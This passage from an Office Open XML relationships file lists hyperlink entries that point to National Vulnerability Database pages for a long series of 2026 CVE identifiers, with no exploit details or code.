Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53933" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62652" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81531" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81823" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86804" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86810" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65812" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71349" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71350" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72985" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72999" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74859" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69350" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69373" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69449" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72927" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72935" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72948" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85981" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52486" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17509" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18021" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53637" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55256" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58649" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62437" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62762" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64918" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66303" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66306" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66308" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67624" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67629" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67630" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68898" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69267" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69361" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69374" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69375" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69395" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69562" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69624" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69626" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69719" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69734" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72938" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72939" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72942" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72956" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72974" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72975" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72977" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76000" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77896" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77911" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78441" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78502" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78503" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78515" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78520" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78522" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78838" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79379" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79573" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80073" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80076" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80078" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80079" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80082" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80084" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80086" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80087" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80088" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80089" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80090" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80091" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81377" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81792" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81802" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84282" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84685" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86077" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86078" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86079" TargetMode="External" 